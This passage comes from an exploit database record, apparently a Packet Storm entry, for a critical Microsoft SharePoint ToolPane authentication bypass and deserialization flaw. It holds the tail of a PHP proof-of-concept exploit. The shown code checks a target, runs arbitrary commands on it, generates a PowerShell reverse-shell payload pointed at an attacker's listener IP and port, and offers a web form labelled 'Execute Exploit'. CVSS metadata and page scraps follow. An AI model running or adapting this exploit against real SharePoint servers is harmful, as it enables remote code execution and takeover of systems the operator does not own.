\"  php poc.php -t http://sharepoint.company.com -c 'whoami'\\n\";\n            echo \"  php poc.php -t http://sharepoint.company.com -l 192.168.1.100 -r 4444\\n\";\n            echo \"  php poc.php --generate -l 192.168.1.100 -r 4444\\n\";\n            exit(1);\n        }\n        \n        if (isset($options['g']) || isset($options['generate'])) {\n            if (!isset($options['l']) && !isset($options['lhost'])) {\n                echo \"Error: LHOST is required for payload generation\\n\";\n                exit(1);\n            }\n            \n            $lhost = isset($options['l']) ? $options['l'] : $options['lhost'];\n            $lport = isset($options['r']) ? $options['r'] : (isset($options['lport']) ? $options['lport'] : 4444);\n            \n            $exploit = new SharePointExploit('');\n            $exploit->generate_powershell_payload($lhost, $lport);\n            exit(0);\n        }\n        \n        if (!isset($options['t']) && !isset($options['target'])) {\n            echo \"Error: Target URL is required\\n\";\n            exit(1);\n        }\n        \n        $target = isset($options['t']) ? $options['t'] : $options['target'];\n        $path = isset($options['p']) ? $options['p'] : (isset($options['path']) ? $options['path'] : '/');\n        $command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami');\n        \n        $exploit = new SharePointExploit($target, $path);\n        \n        // Check vulnerability first\n        if (!$exploit->check_vulnerability()) {\n            echo \"[-] Target does not appear to be vulnerable\\n\";\n            exit(1);\n        }\n        \n        // Execute exploit\n        $exploit->exploit($command);\n        \n    } else {\n        // Web interface\n        if (isset($_POST['exploit'])) {\n            $target = $_POST['target'] ?? '';\n            $path = $_POST['path'] ?? '/';\n            $command = $_POST['command'] ?? 'whoami';\n            \n            if ($target) {\n                $exploit = new SharePointExploit($target, $path);\n                \n                ob_start();\n                $exploit->check_vulnerability();\n                $exploit->exploit($command);\n                $output = ob_get_clean();\n                \n                echo \"<pre>$output</pre>\";\n            } else {\n                echo \"<div style='color: red;'>Target URL is required</div>\";\n            }\n        } else {\n            echo '<!DOCTYPE html>\n            <html>\n            <head>\n                <title>SharePoint RCE Exploit</title>\n                <style>\n                    body { font-family: Arial, sans-serif; margin: 40px; }\n                    .container { max-width: 600px; margin: 0 auto; }\n                    .form-group { margin-bottom: 15px; }\n                    label { display: block; margin-bottom: 5px; font-weight: bold; }\n                    input[type=\"text\"] { \n                        width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px; \n                    }\n                    button { \n                        background: #007cba; color: white; padding: 10px 20px; \n                        border: none; border-radius: 4px; cursor: pointer; \n                    }\n                </style>\n            </head>\n            <body>\n                <div class=\"container\">\n                    <h1>SharePoint ToolPane RCE Exploit</h1>\n                    <form method=\"post\">\n                        <input type=\"hidden\" name=\"exploit\" value=\"1\">\n                        \n                        <div class=\"form-group\">\n                            <label for=\"target\">Target URL:</label>\n                            <input type=\"text\" id=\"target\" name=\"target\" placeholder=\"http://sharepoint.company.com\" required>\n                        </div>\n                        \n                        <div class=\"form-group\">\n                            <label for=\"path\">Base Path:</label>\n                            <input type=\"text\" id=\"path\" name=\"path\" value=\"/\">\n                        </div>\n                        \n                        <div class=\"form-group\">\n                            <label for=\"command\">Command:</label>\n                            <input type=\"text\" id=\"command\" name=\"command\" value=\"whoami\">\n                        </div>\n                        \n                        <button type=\"submit\">Execute Exploit</button>\n                    </form>\n                </div>\n            </body>\n            </html>';\n        }\n    }\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212316",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212316/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Microsoft SharePoint Server ToolPane Authentication Bypass / Unsafe Deserialization_PACKETSTORM:212316

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply